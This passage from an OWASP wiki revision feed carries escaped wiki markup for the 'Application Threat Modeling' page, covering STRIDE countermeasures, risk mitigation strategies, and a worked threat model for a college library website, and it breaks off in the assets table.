&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Denial of Service&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Appropriate authentication&lt;br /&gt;
#Appropriate authorization&lt;br /&gt;
#Filtering&lt;br /&gt;
#Throttling&lt;br /&gt;
#Quality of service&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Elevation of privilege&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Run with least privilege&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Once threats and corresponding countermeasures are identified it is possible to derive a threat profile with the following criteria:&lt;br /&gt;
&lt;br /&gt;
# '''Non mitigated threats:''' Threats which have no countermeasures and represent vulnerabilities that can be fully exploited and cause an impact &lt;br /&gt;
# '''Partially mitigated threats:''' Threats partially mitigated by one or more countermeasures which represent vulnerabilities that can only partially be exploited and cause a limited impact &lt;br /&gt;
# '''Fully mitigated threats:''' These threats have appropriate countermeasures in place and do not expose vulnerability and cause impact&lt;br /&gt;
&lt;br /&gt;
===Mitigation Strategies===&lt;br /&gt;
The objective of risk management is to reduce the impact that the exploitation of a threat can have to the application. This can be done by responding to a theat with a risk mitigation strategy. In general there are five options to mitigate threats &lt;br /&gt;
# '''Do nothing:''' for example, hoping for the best&lt;br /&gt;
# '''Informing about the risk:''' for example, warning user population about the risk&lt;br /&gt;
# '''Mitigate the risk:''' for example, by putting countermeasures in place&lt;br /&gt;
# '''Accept the risk:''' for example, after evaluating the impact of the exploitation (business impact)&lt;br /&gt;
# '''Transfer the risk:''' for example, through contractual agreements and insurance&lt;br /&gt;
&lt;br /&gt;
The decision of which strategy is most appropriate depends on the impact an exploitation of a threat can have, the likelihood of its occurrence, and the costs for transferring (i.e. costs for insurance) or avoiding (i.e. costs or losses due redesign) it. That is, such decision is based on the risk a threat poses to the system. Therefore, the chosen strategy does not mitigate the threat itself but the risk it poses to the system. Ultimately the overall risk has to take into account the business impact, since this is a critical factor for the business risk management strategy. One strategy could be to fix only the vulnerabilities for which the cost to fix is less than the potential business impact derived by the exploitation of the vulnerability. Another strategy could be to accept the risk when the loss of some security controls (e.g. Confidentiality, Integrity, and Availability) implies a small degradation of the service, and not a loss of a critical business function. In some cases, transfer of the risk to another service provider might also be an option. &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Code Review Project]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Application_Threat_Modeling&amp;diff=60014</id>
		<title>Application Threat Modeling</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Application_Threat_Modeling&amp;diff=60014"/>
				<updated>2009-05-04T14:51:38Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* STRIDE */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[OWASP Code Review Guide Table of Contents]]__TOC__&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
===Introduction===&lt;br /&gt;
Threat modeling is an approach for analyzing the security of an application. It is a structured approach that enables you to identify, quantify, and address the security risks associated with an application. Threat modeling is not an approach to reviewing code, but it does complement the security code review process. The inclusion of threat modeling in the SDLC can help to ensure that applications are being developed with security built-in from the very beginning. This, combined with the documentation produced as part of the threat modeling process, can give the reviewer a greater understanding of the system. This allows the reviewer to see where the entry points to the application are and the associated threats with each entry point. The concept of threat modeling is not new but there has been a clear mindset change in recent years. Modern threat modeling looks at a system from a potential attacker's perspective, as opposed to a defender's viewpoint. Microsoft have been strong advocates of the process over the past number of years. They have made threat modeling a core component of their SDLC, which they claim to be one of the reasons for the increased security of their products in recent years. &lt;br /&gt;
&lt;br /&gt;
When source code analysis is performed outside the SDLC, such as on existing applications, the results of the threat modeling help in reducing the complexity of the source code analysis by promoting an in-depth first approach vs. breadth first approach. Instead of reviewing all source code with equal focus, you can prioritize the security code review of components whose threat modeling has ranked with high risk threats. &lt;br /&gt;
&lt;br /&gt;
The threat modeling process can be decomposed into 3 high level steps:&lt;br /&gt;
&lt;br /&gt;
'''Step 1:''' Decompose the Application. &lt;br /&gt;
The first step in the threat modeling process is concerned with gaining an understanding of the application and how it interacts with external entities. This involves creating use-cases to understand how the application is used, identifying entry points to see where a potential attacker could interact with the application, identifying assets i.e. items/areas that the attacker would be interested in, and identifying trust levels which represent the access rights that the application will grant to external entities. This information is documented in the Threat Model document and it is also used to produce data flow diagrams (DFDs) for the application. The DFDs show the different paths through the system, highlighting the privilege boundaries. &lt;br /&gt;
&lt;br /&gt;
'''Step 2:''' Determine and rank threats.&lt;br /&gt;
Critical to the identification of threats is using a threat categorization methodology. A threat categorization such as STRIDE can be used, or the Application Security Frame (ASF) that defines threat categories such as Auditing &amp;amp; Logging, Authentication, Authorization, Configuration Management, Data Protection in Storage and Transit, Data Validation, Exception Management. The goal of the threat categorization is to help identify threats both from the attacker (STRIDE) and the defensive perspective (ASF). DFDs produced in step 1 help to identify the potential threat targets from the attacker's perspective, such as data sources, processes, data flows, and interactions with users. These threats can be identified further as the roots for threat trees; there is one tree for each threat goal. From the defensive perspective, ASF categorization helps to identify the threats as weaknesses of security controls for such threats. Common threat-lists with examples can help in the identification of such threats. Use and abuse cases can illustrate how existing protective measures could be bypassed, or where a lack of such protection exists. The determination of the security risk for each threat can be determined using a value-based risk model such as DREAD or a less subjective qualitative risk model based upon general risk factors (e.g. likelihood and impact).&lt;br /&gt;
&lt;br /&gt;
'''Step 3:''' Determine countermeasures and mitigation.&lt;br /&gt;
A lack of protection of a threat might indicate a vulnerability whose risk exposure could be mitigated with the implementation of a countermeasure. Such countermeasures can be identified using threat-countermeasure mapping lists. Once a risk ranking is assigned to the threats, it is possible to sort threats from the highest to the lowest risk, and prioritize the mitigation effort, such as by responding to such threats by applying the identified countermeasures. The risk mitigation strategy might involve evaluating these threats from the business impact that they pose and reducing  the risk. Other options might include taking the risk, assuming the business impact is acceptable because of compensating controls, informing the user of the threat, removing the risk posed by the threat completely, or the least preferable option, that is, to do nothing. &lt;br /&gt;
&lt;br /&gt;
Each of the above steps are documented as they are carried out. The resulting document is the threat model for the application. This guide will use an example to help explain the concepts behind threat modeling. The same example will be used throughout each of the 3 steps as a learning aid. The example that will be used is a college library website. At the end of the guide we will have produced the threat model for the college library website. Each of the steps in the threat modeling process are described in detail below.&lt;br /&gt;
&lt;br /&gt;
== Decompose the Application ==&lt;br /&gt;
The goal of this step is to gain an understanding of the application and how it interacts with external entities. This goal is achieved by information gathering and documentation. The information gathering process is carried out using a clearly defined structure, which ensures the correct information is collected. This structure also defines how the information should be documented to produce the Threat Model. &lt;br /&gt;
&lt;br /&gt;
==Threat Model Information==&lt;br /&gt;
The first item in the threat model is the information relating to the threat model. &lt;br /&gt;
This must include the the following:&lt;br /&gt;
&lt;br /&gt;
# '''Application Name''' - The name of the application.&lt;br /&gt;
# '''Application Version''' - The version of the application.&lt;br /&gt;
# '''Description''' - A high level description of the application.&lt;br /&gt;
# '''Document Owner''' - The owner of the threat modeling document. &lt;br /&gt;
# '''Participants''' - The participants involved in the threat modeling process for this application.&lt;br /&gt;
# '''Reviewer''' - The reviewer(s) of the threat model.&amp;lt;br/&amp;gt;&lt;br /&gt;
Example:&amp;lt;br/&amp;gt;&lt;br /&gt;
[[Category:FIXME|the list above includes an Application name, but the example does not have one]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;1&amp;quot; CELLPADDING=&amp;quot;7&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;&amp;gt;Threat Model Information&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th align=&amp;quot;left&amp;quot;&amp;gt;Application Version:&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1.0&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th align=&amp;quot;left&amp;quot;&amp;gt; Description:&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The college library website is the first implementation of a website to provide librarians and library patrons (students and college staff) with online services. &lt;br /&gt;
As this is the first implementation of the website, the functionality will be limited. There will be three users of the application: &amp;lt;br/&amp;gt;&lt;br /&gt;
1. Students&amp;lt;br/&amp;gt;&lt;br /&gt;
2. Staff&amp;lt;br/&amp;gt;&lt;br /&gt;
3. Librarians&amp;lt;br/&amp;gt;&lt;br /&gt;
Staff and students will be able to log in and search for books, and staff members can request books. Librarians will be able to log in, add books, add users, and search for books.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th align=&amp;quot;left&amp;quot;&amp;gt;Document Owner:&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;David Lowry&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th align=&amp;quot;left&amp;quot;&amp;gt;Participants:&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;David Rook&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th align=&amp;quot;left&amp;quot;&amp;gt;Reviewer:&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Eoin Keary&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==External Dependencies==&lt;br /&gt;
External dependencies are items external to the code of the application that may pose a threat to the application. These items are typically still within the control of the organization, but possibly not within the control of the development team. The first area to look at when investigating external dependencies is how the application will be deployed in a production environment, and what are the requirements surrounding this. This involves looking at how the application is or is not intended to be run. For example if the application is expected to be run on a server that has been hardened to the organization's hardening standard and it is expected to sit behind a firewall, then this information should be documented in the external dependencies section. External dependencies should be documented as follows:&lt;br /&gt;
&lt;br /&gt;
# '''ID''' - A unique ID assigned to the external dependency.&lt;br /&gt;
# '''Description''' - A textual description of the external dependency.&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
Example:&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;table align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;1&amp;quot; CELLPADDING=&amp;quot;7&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;&amp;gt;External Dependencies&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;ID&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Description&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The college library website will run on a Linux server running Apache.  This server will be hardened as per the college's server hardening standard. This includes the application of the latest operating system and application security patches.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;2&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The database server will be MySQL and it will run on a Linux server. This server will be hardened as per the college's server hardening standard. This will include the application of the lastest operating system and application security patches.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;3&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The connection between the Web Server and the database server will be over a private network.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;4&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The Web Server is behind a firewall and the only communication available is TLS.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Entry Points==&lt;br /&gt;
Entry points define the interfaces through which potential attackers can interact with the application or supply it with data. In order for a potential attacker to attack an application, entry points must exist. Entry points in an application can be layered, for example each web page in a web application may contain multiple entry points. Entry points should be documented as follows: &lt;br /&gt;
&lt;br /&gt;
#  '''ID''' - A unique ID assigned to the entry point. This will be used to cross reference the entry point with any threats or vulnerabilities that are identified. In the case of layer entry points, a major.minor notation should be used.&lt;br /&gt;
# '''Name''' - A descriptive name identifying the entry point and its purpose.&lt;br /&gt;
# '''Description''' - A textual description detailing the interaction or processing that occurs at the entry point.&lt;br /&gt;
# '''Trust Levels''' - The level of access required at the entry point is documented here. These will be cross referenced with the trusts levels defined later in the document.&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
Example:&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;table align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;1&amp;quot; CELLPADDING=&amp;quot;7&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th colspan=&amp;quot;4&amp;quot; align=&amp;quot;center&amp;quot;&amp;gt;Entry Points&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;5%&amp;quot;&amp;gt;ID&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;15%&amp;quot;&amp;gt;Name&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;45%&amp;quot;&amp;gt;Description&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;25%&amp;quot;&amp;gt;Trust Levels&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;HTTPS Port&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The college library website will be only be accessable via TLS. All pages within the college library website are layered on this entry point.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;(1) Anonymous Web User&amp;lt;br/&amp;gt;&lt;br /&gt;
(2) User with Valid Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(3) User with Invalid Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(4) Librarian&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1.1&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Library Main Page&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The splash page for the college library website is the entry point for all users.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;(1) Anonymous Web User&amp;lt;br/&amp;gt;&lt;br /&gt;
(2) User with Valid Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(3) User with Invalid Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(4) Librarian&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1.2&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Login Page&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Students, faculty members and librarians must log in to the college library website before they can carry out any of the use cases.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;(1) Anonymous Web User&amp;lt;br/&amp;gt;&lt;br /&gt;
(2) User with Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(3) User with Invalid Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(4) Librarian&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1.2.1&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Login Function&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The login function accepts user supplied credentials and compares them with those in the database.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(2) User with Valid Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(3) User with Invalid Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(4) Librarian&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1.3&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Search Entry Page&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The page used to enter  a search query.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(2) User with Valid Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(4) Librarian&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Assets==&lt;br /&gt;
The system must have something that the attacker is interested in; these items/areas of interest are defined as assets. Assets are essentially threat targets, i.e. they are the reason threats will exist. Assets can be both physical assets and abstract assets. For example, an asset of an application might be a list of clients and their personal information; this is a physical asset. An abstract asset might be the reputation of an organsation. Assets are documented in the threat model as follows: &lt;br /&gt;
&lt;br /&gt;
# '''ID''' - A unique ID is assigned to identify each asset. This will be used to cross reference the asset with any threats or vulnerabilities that are identified.&lt;br /&gt;
# '''Name''' - A descriptive name that clearly identifies the asset.&lt;br /&gt;
# '''Description''' - A textual description of what the asset is and why it needs to be protected.&lt;br /&gt;
# '''Trust Levels''' - The level of access required to access the entry point is documented here. These will be cross referenced with the trust levels defined in the next step.&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
Example:&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;table align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;1&amp;quot; CELLPADDING=&amp;quot;7&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th colspan=&amp;quot;4&amp;quot; align=&amp;quot;center&amp;quot;&amp;gt;Assets&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;5%&amp;quot;&amp;gt;ID&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;15%&amp;quot;&amp;gt;Name&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;55%&amp;quot;&amp;gt;Description&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;25%&amp;quot;&amp;gt;Trust Levels&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Library Users and Librarian&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Assets relating to students, faculty members, and librarians.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1.1&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;User Login Details&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The login credentials that a student or a faculty member will use to log into the College Library website.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(2) User with Valid Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(4) Librarian &amp;lt;br/&amp;gt;&lt;br /&gt;
(5) Database Server Administrator &amp;lt;br/&amp;gt;&lt;br /&gt;
(7) Web Server User Process&amp;lt;br/&amp;gt;&lt;br /&gt;
(8) Database Read User&amp;lt;br/&amp;gt;&lt;br /&gt;
(9) Database Read/Write User&lt;br /&gt;
&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1.2&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Librarian Login Details&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The login credentials that a Librarian will use to log into the College Library website.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(4) Librarian &amp;lt;br/&amp;gt;&lt;br /&gt;
(5) Database Server Administrator &amp;lt;br/&amp;gt;&lt;br /&gt;
(7) Web Server User Process&amp;lt;br/&amp;gt;&lt;br /&gt;
(8) Database Read User&amp;lt;br/&amp;gt;&lt;br /&gt;
(9) Database Read/Write User&lt;br /&gt;
&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1.3&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Personal Data&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The College Library website will store personal information relating to the students, faculty members, and librarians.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(4) Librarian &amp;lt;br/&amp;gt;&lt;br /&gt;
(5) Database Server Administrator &amp;lt;br/&amp;gt;&lt;br /&gt;
(6) Website Administrator &amp;lt;br/&amp;gt;&lt;br /&gt;
(7) Web Server User Process&amp;lt;br/&amp;gt;&lt;br /&gt;
(8) Database Read User&amp;lt;br/&amp;gt;&lt;br /&gt;
(9) Database Read/Write User&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;2&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;System&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Assets relating to the underlying system.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;2.1&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Availability of College Library Website&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The College Library website should be available 24 hours a day and can be accessed by all students, college faculty members, and librarians.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(5) Database Server Administrator &amp;lt;br/&amp;gt;&lt;br /&gt;
(6) Website Administrator &amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;2.2&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Ability to Execute Code as a Web Server User&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;This is the ability to execute source code on the web server as a web server user.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(6) Website Administrator &amp;lt;br/&amp;gt;&lt;br /&gt;
(7) Web Server User Process &amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;2.3&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Ability to Execute SQL as a Database Read User&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;This is the ability to execute SQL select queries on the database, and thus retrieve any information stored within the College Library database.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(5) Database Server Administrator&amp;lt;br/&amp;gt;&lt;br /&gt;
(8) Database Read User&amp;lt;br/&amp;gt;&lt;br /&gt;
(9) Database Read/Write User&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;2.4&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Ability to Execute SQL as a Database Read/Write User&amp;lt;/td&amp;gt;&lt;br /&gt;
